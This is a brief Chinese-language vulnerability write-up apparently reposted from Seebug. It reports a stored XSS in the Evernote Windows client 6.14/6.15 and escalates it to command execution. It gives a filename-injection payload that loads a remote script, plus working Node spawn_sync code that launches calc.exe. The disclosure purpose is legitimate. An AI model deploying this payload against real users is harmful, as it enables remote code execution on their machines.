原文地址:https://paper.seebug.org/736/

印象笔记 Windows 客户端 6.14 储存型 XSS 漏洞
我现在百度上下载了一个6.14版本的进行原先的存储型XSS测试

1.png

先上传一张图片,然后进行改名
2.png
双击点开图片
3.png
接下来下载了一个6.15版本,将原先的图片双击
4.png

还是可以触发原先的xss的
本地文件读取 和 远程命令执行的实现

在6.14中将图片更名为" onclick="alert(1)"><script src="http://server:8000/1.js">.jpg

在虚拟机中开启phpstudy,然后根目录1.js

内容:

// command executed
try{
  spawn_sync = process.binding('spawn_sync');
  envPairs = [];
  for (var key in window.process.env) {
    envPairs.push(key + '=' + window.process.env[key]);
  }
  args = [];

  const options = {
    file: 'C:\\\\Windows\\system32\\calc.exe',
    args: args,
    envPairs: envPairs,
    stdio: [
      { type: 'pipe', readable: true, writable: false },
      { type: 'pipe', readable: false, writable: true },
      { type: 'pipe', readable: false, writable: true } 
    ]
  };
  spawn_sync.spawn(options);
}
catch(err){
  alert(err);
}

在印象笔记 笔记—演示

5.png